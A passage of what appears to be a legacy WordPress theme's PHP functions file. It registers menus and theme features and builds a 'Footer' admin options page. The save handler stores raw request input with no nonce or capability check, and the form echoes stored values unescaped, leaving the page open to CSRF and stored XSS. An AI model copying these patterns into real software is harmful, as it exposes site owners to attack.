		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
